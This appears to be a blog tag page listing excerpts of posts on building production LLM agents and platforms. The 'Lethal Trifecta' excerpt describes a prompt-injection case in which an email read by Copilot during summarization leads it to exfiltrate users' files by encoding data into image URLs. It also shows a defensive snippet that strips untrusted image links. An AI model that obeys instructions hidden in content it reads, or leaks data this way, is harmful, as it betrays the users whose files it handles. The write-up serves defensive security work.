
83 posts tagged with "llm"


Why Your Agent Should Write Code, Not JSON

· 10 min read
Tian Pan
Software Engineer

Most agent frameworks default to the same action model: the LLM emits a JSON blob, the host system parses it, calls a tool, returns the result. Repeat. It's clean, auditable, and almost universally used — which is exactly the problem. For anything beyond a single tool call, this architecture forces you to write scaffolding code that solves problems the agent could solve itself, if only it were allowed to write code.

There's a different approach: give the agent a Python interpreter and let it emit executable code as its action. One published benchmark shows a 20% higher task success rate than JSON tool-calling. An internal benchmark shows 30% fewer LLM round-trips on average. A framework built around this idea hit #1 on the GAIA leaderboard (44.2% on validation) shortly after release. The tradeoff is a more complex execution environment — but the engineering required is tractable, and the behavioral gains are real.
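To make the contrast concrete, here is a minimal sketch of the two action models. The tool names and message shapes are invented for illustration, and the code-as-action path omits the sandboxing a real system would need:

```python
import json

# Hypothetical tools; names are illustrative, not from any framework.
TOOLS = {
    "add": lambda a, b: a + b,
    "upper": lambda s: s.upper(),
}

def run_json_action(action_blob: str):
    """JSON tool-calling: one parse -> one tool call -> one result."""
    action = json.loads(action_blob)
    tool = TOOLS[action["tool"]]
    return tool(**action["args"])

def run_code_action(code: str):
    """Code-as-action: the model's code composes tools in one step."""
    namespace = dict(TOOLS)
    exec(code, namespace)  # sandboxing deliberately omitted in this sketch
    return namespace.get("result")

# The JSON path needs one model round-trip per call; the code path
# chains both tools inside a single emitted action.
r1 = run_json_action('{"tool": "add", "args": {"a": 2, "b": 3}}')
r2 = run_code_action("result = upper('sum is ' + str(add(2, 3)))")
```

The difference shows up at scale: composing N tool results via JSON costs N round-trips, while a single code action can express the whole computation.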

Why Your AI Agent Wastes Most of Its Context Window on Tools

· 10 min read
Tian Pan
Software Engineer

You connect your agent to 50 MCP tools. It can query databases, call APIs, read files, send emails, browse the web. On paper, it has everything it needs. In practice, half your production incidents trace back to tool use—wrong parameters, blown context budgets, cascading retry loops that cost ten times what you expected.

Here's the part most tutorials skip: every tool definition you load is a token tax paid upfront, before the agent processes a single user message. With 50+ tools connected, definitions alone can consume 70,000–130,000 tokens per request. That's not a corner case—it's the default state of any agent connected to multiple MCP servers.
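You can estimate this tax yourself. The sketch below builds 50 hypothetical MCP-style tool definitions and sizes them with a rough 4-characters-per-token heuristic (a real count needs the model's tokenizer, and real definitions vary widely):

```python
import json

# Rough token estimate (~4 chars/token); use a real tokenizer in practice.
def estimate_tokens(text: str) -> int:
    return len(text) // 4

# Hypothetical MCP-style tool definition, for illustration only.
def tool_def(name: str) -> dict:
    return {
        "name": name,
        "description": f"Does {name}. " + "Detailed usage notes. " * 20,
        "inputSchema": {
            "type": "object",
            "properties": {f"arg{i}": {"type": "string"} for i in range(8)},
        },
    }

defs = [tool_def(f"tool_{i}") for i in range(50)]
total = sum(estimate_tokens(json.dumps(d)) for d in defs)
print(f"~{total} tokens consumed before the first user message")
```

Even these deliberately modest definitions add up to thousands of tokens per request; production schemas with long descriptions and nested parameters get you to the five-figure range quickly.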

Why Multi-Agent AI Architectures Keep Failing (and What to Build Instead)

· 8 min read
Tian Pan
Software Engineer

Most teams that build multi-agent systems hit the same wall: the thing works in demos and falls apart in production. Not because they implemented the coordination protocol wrong. Because the protocol itself is the problem.

Multi-agent AI has an intuitive appeal. Complex tasks should be broken into parallel workstreams. Specialized agents should handle specialized work. The orchestrator ties it together and the whole becomes greater than the sum of its parts. This intuition is wrong — or more precisely, it's premature. The practical failure rates of multi-agent systems in production range from 41% to 86.7% across studied execution traces. That's not a tuning problem. That's a structural one.

Building a Generative AI Platform: Architecture, Trade-offs, and the Components That Actually Matter

· 12 min read
Tian Pan
Software Engineer

Most teams treating their GenAI stack as a model integration project eventually discover they've actually built—or need to build—a platform. The model is the easy part. The hard part is everything around it: routing queries to the right model, retrieving context reliably, filtering unsafe outputs, caching redundant calls, tracing what went wrong in a chain of five LLM calls, and keeping costs from tripling month-over-month as usage scales.

This article is about that platform layer. Not the model weights, not the prompts—the surrounding infrastructure that separates a working proof of concept from something you'd trust to serve a million users.
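Two of those components fit in a few lines each. This is a toy sketch of a rule-based model router and an exact-match response cache; the model names and the length-based routing rule are stand-ins for whatever policy a real platform uses:

```python
import hashlib

# Exact-match cache keyed on the query; real platforms often add
# semantic caching, TTLs, and per-tenant isolation.
CACHE: dict[str, str] = {}

def route(query: str) -> str:
    # Cheap illustrative heuristic: short queries go to a small model.
    return "small-model" if len(query) < 80 else "large-model"

def cached_call(query: str, call_model) -> str:
    key = hashlib.sha256(query.encode()).hexdigest()
    if key not in CACHE:
        CACHE[key] = call_model(route(query), query)
    return CACHE[key]

calls = []
def fake_model(name: str, q: str) -> str:
    calls.append(name)  # record which model was actually invoked
    return f"{name}: answer"

a1 = cached_call("hi", fake_model)
a2 = cached_call("hi", fake_model)  # served from cache, no second call
```

The point is not these particular heuristics but the shape: routing and caching sit in front of every model call, which is exactly why they belong to the platform layer rather than to any one feature.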

12-Factor Agents: A Framework for Building AI Systems That Actually Ship

· 11 min read
Tian Pan
Software Engineer

The teams actually shipping reliable AI agents to production customers are mostly not using agent frameworks. They rolled their own.

That observation, surfaced from conversations with 100+ technical founders, is the uncomfortable starting point for the 12-Factor Agents framework — a manifesto for building LLM-powered software that reaches production instead of languishing at 80% quality forever. The framework is named deliberately after the original 12-Factor App methodology that shaped a generation of web services. The analogy holds: just as the 12-factor app gave teams a principled approach to building deployable web services, 12-factor agents provides the principles for building reliable, observable AI systems.

The 19,000-star GitHub repository documents what the best-performing production teams figured out independently. Here is what they know.

The Lethal Trifecta: Why Your AI Agent Is One Email Away from a Data Breach

· 9 min read
Tian Pan
Software Engineer

In June 2025, a researcher sent a carefully crafted email to a Microsoft 365 Copilot user. No link was clicked. No attachment opened. The email arrived, Copilot read it during a routine summarization task, and within seconds the AI began exfiltrating files from OneDrive, SharePoint, and Teams — silently transmitting contents to an attacker-controlled server by encoding data into image URLs it asked to "render." The victim never knew it happened.

This wasn't a novel zero-day in the traditional sense. There was no buffer overflow, no SQL injection. The vulnerability was architectural: the system combined three capabilities that, individually, seem like obvious product features. Together, they form what's now called the Lethal Trifecta.
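One common mitigation for the exfiltration channel described above is to sanitize model output before rendering it. This is a minimal sketch that strips markdown image links pointing at hosts outside an allowlist; the allowlist and the example URLs are hypothetical, and a real defense would also cover plain links, redirects, and other egress paths:

```python
import re

# Hypothetical allowlist of hosts the renderer may fetch images from.
ALLOWED_HOSTS = {"assets.example.com"}

# Matches markdown images: ![alt](http(s)://host/path...)
IMG_PATTERN = re.compile(r"!\[[^\]]*\]\((https?://([^/)\s]+)[^)]*)\)")

def strip_untrusted_images(text: str) -> str:
    def repl(m: re.Match) -> str:
        host = m.group(2).lower()
        return m.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMG_PATTERN.sub(repl, text)

out = strip_untrusted_images(
    "Summary ![x](https://attacker.example/leak?d=SECRET) done"
)
```

Filtering the render path removes one leg of the trifecta (the exfiltration channel) without touching the other two, which is why it is a common first mitigation.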

LLM Observability in Production: Tracing What You Can't Predict

· 10 min read
Tian Pan
Software Engineer

Your monitoring stack tells you everything about request rates, CPU, and database latency. It tells you almost nothing about whether your LLM just hallucinated a refund policy, why a customer-facing agent looped through three tool calls to answer a simple question, or which feature in your product is quietly burning $800 a day in tokens.

Traditional observability was built around deterministic systems. LLMs are structurally different — same input, different output, every time. The failure mode isn't a 500 error or a timeout; it's a confident, plausible-sounding answer that happens to be wrong. The cost isn't steady and predictable; it spikes when a single misconfigured prompt hits a traffic wave. Debugging isn't "find the exception in the stack trace"; it's "reconstruct why the agent chose this tool path at 2 AM on Tuesday."

This is the problem LLM observability solves — and the discipline has matured significantly over the past 18 months.
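The core primitive is a span per LLM call that records latency, token counts, and cost. This sketch shows the shape; the pricing numbers are invented, the token counts use a crude estimate, and a real system would export these spans to a backend such as an OpenTelemetry collector:

```python
import time
from dataclasses import dataclass

@dataclass
class Span:
    name: str
    latency_s: float
    prompt_tokens: int
    completion_tokens: int

    @property
    def cost_usd(self) -> float:
        # Hypothetical pricing: $3 / $15 per million tokens.
        return self.prompt_tokens * 3e-6 + self.completion_tokens * 15e-6

def traced_llm_call(name: str, llm, prompt: str) -> tuple[str, Span]:
    start = time.perf_counter()
    reply = llm(prompt)
    span = Span(
        name=name,
        latency_s=time.perf_counter() - start,
        prompt_tokens=len(prompt) // 4,       # rough ~4 chars/token estimate
        completion_tokens=len(reply) // 4,
    )
    return reply, span

# `fake_llm` stands in for a real model client.
reply, span = traced_llm_call("summarize", lambda p: "ok " * 50, "text " * 200)
```

Once every call emits a span like this, the questions above become queries: group spans by feature to find the $800-a-day hotspot, or replay a trace to see which tool path the agent took at 2 AM.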

The Hidden Costs of Context: Managing Token Budgets in Production LLM Systems

· 9 min read
Tian Pan
Software Engineer

Most teams shipping LLM applications for the first time make the same mistake: they treat context windows as free storage. The model supports 128K tokens? Great, pack it full. The model supports 1M tokens? Even better — dump everything in. What follows is a billing shock that arrives about three weeks before the product actually works well.

Context is not free. It's not even cheap. And beyond cost, blindly filling a context window actively makes your model worse. A focused 300-token context frequently outperforms an unfocused 113,000-token context. This is not an edge case — it's a documented failure mode with a name: "lost in the middle." Managing context well is one of the highest-leverage engineering decisions you'll make on an LLM product.
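The simplest budget discipline is to keep the system prompt plus only the most recent history that fits. A minimal sketch, using a 4-characters-per-token stand-in for a real tokenizer (real systems would also summarize or rank what gets dropped rather than just truncating):

```python
# Rough token estimate (~4 chars/token); swap in a real tokenizer.
def estimate_tokens(text: str) -> int:
    return len(text) // 4

def trim_to_budget(system: str, history: list[str], budget: int) -> list[str]:
    """Keep the system prompt plus the newest messages that fit the budget."""
    kept, used = [], estimate_tokens(system)
    for msg in reversed(history):  # walk newest-first
        cost = estimate_tokens(msg)
        if used + cost > budget:
            break
        kept.append(msg)
        used += cost
    return [system] + list(reversed(kept))  # restore chronological order

# Three 100-token messages against a 250-token budget: the oldest drops.
msgs = trim_to_budget("You are helpful.", ["a" * 400, "b" * 400, "c" * 400], 250)
```

Even this naive policy beats "pack it full": it caps spend per request and keeps the most relevant (recent) turns out of the mushy middle of the window.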

Structured Output in Production: Getting LLMs to Return Reliable JSON

· 8 min read
Tian Pan
Software Engineer

At some point in production, every LLM-powered application needs to stop treating model output as prose and start treating it as data. The moment you try to reliably extract a JSON object from a language model — and feed it downstream into a database, API call, or UI — you discover just how many ways this can go wrong. The model wraps JSON in markdown fences. It generates a valid object but omits required fields. It formats dates inconsistently across calls. It hallucinates enum values. Any one of these failures silently corrupts downstream state.

Structured output has evolved from an afterthought into a first-class concern for production LLM systems. This post covers the three main mechanisms for enforcing it, where each breaks down, and how to design schemas that keep quality high under constraint.
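The first two failure modes above (markdown fences and missing fields) are cheap to defend against at the parse boundary. A minimal sketch, with an illustrative required-field set (production code would validate against a full schema, e.g. with a library like Pydantic or jsonschema):

```python
import json
import re

# Illustrative required fields for a hypothetical payload.
REQUIRED = {"name", "amount"}

def extract_json(raw: str) -> dict:
    # Strip markdown fences the model may wrap around the payload.
    m = re.search(r"```(?:json)?\s*(\{.*\})\s*```", raw, re.DOTALL)
    payload = m.group(1) if m else raw
    obj = json.loads(payload)          # raises on malformed JSON
    missing = REQUIRED - obj.keys()
    if missing:
        raise ValueError(f"missing required fields: {sorted(missing)}")
    return obj

obj = extract_json('```json\n{"name": "refund", "amount": 12.5}\n```')
```

Failing loudly at this boundary is the point: a raised `ValueError` can trigger a retry with the error in the prompt, whereas a silently incomplete object corrupts downstream state.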

Prompt Engineering Deep Dive: From Basics to Advanced Techniques

· 10 min read
Tian Pan
Software Engineer

Most engineers treat prompts as magic words — tweak a phrase, hope it works, move on. That works fine for demos. In production, it produces a system where nobody knows why the model behaves differently on Tuesday than on Monday, and where a routine model update silently breaks three features. Prompt engineering done right is a discipline, not a ritual. This post covers the full stack: when to use each technique, what the benchmarks actually show, and where the traps are.

What AI Benchmarks Actually Measure (And Why You Shouldn't Trust the Leaderboard)

· 10 min read
Tian Pan
Software Engineer

When GPT-4o, Claude 3.5 Sonnet, and Llama 3.1 405B all score 88–93% on MMLU, what does that number actually tell you about which model to deploy? The uncomfortable answer: almost nothing. The benchmark that once separated capable models from mediocre ones has saturated. Every frontier model aces it, yet they behave very differently in production. The gap between benchmark performance and real-world utility has never been wider, and understanding why is now essential for any engineer building on top of LLMs.

Benchmarks feel rigorous because they produce numbers. A number looks like measurement, and measurement looks like truth. But the legitimacy of a benchmark score depends entirely on the validity of what it's measuring—and that validity breaks down in ways that are rarely surfaced on leaderboards.

Tool Calling in Production: The Loop, the Pitfalls, and What Actually Works

· 9 min read
Tian Pan
Software Engineer

The first time your agent silently retries the same broken tool call three times before giving up, you realize that "just add tools" is not a production strategy. Tool calling unlocks genuine capabilities — external data, side effects, guaranteed-shape outputs — but the agentic loop that makes it work has sharp edges that don't show up in demos.

This post is about those edges: how the loop actually runs, the formatting rules that quietly destroy parallel execution, how to write tool descriptions that make the model choose correctly, and how to handle errors in a way that lets the model recover instead of spiral.
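The loop itself is small; the recovery behavior is the part that matters. This sketch feeds tool errors back to the model as messages instead of retrying blindly; `fake_model`, the tool names, and the action/message shapes are all invented for illustration:

```python
import json

# Hypothetical tool registry for the sketch.
TOOLS = {"get_price": lambda symbol: {"symbol": symbol, "price": 101.0}}

def run_loop(model, user_msg: str, max_steps: int = 5):
    messages = [{"role": "user", "content": user_msg}]
    for _ in range(max_steps):
        action = model(messages)
        if action["type"] == "final":
            return action["content"]
        try:
            result = TOOLS[action["tool"]](**action["args"])
            messages.append({"role": "tool", "content": json.dumps(result)})
        except Exception as exc:
            # Feed the error back so the model can correct itself,
            # instead of silently retrying the same broken call.
            messages.append({"role": "tool", "content": f"error: {exc}"})
    return "gave up"

# Stand-in model: one tool call, then a final answer from the result.
def fake_model(messages):
    last = messages[-1]
    if last["role"] == "user":
        return {"type": "tool", "tool": "get_price", "args": {"symbol": "ACME"}}
    return {"type": "final", "content": f"Answer based on {last['content']}"}

answer = run_loop(fake_model, "What is ACME trading at?")
```

Note the two guardrails: a `max_steps` cap so a confused model cannot loop forever, and error-as-observation so a bad call becomes something the model can reason about on the next turn.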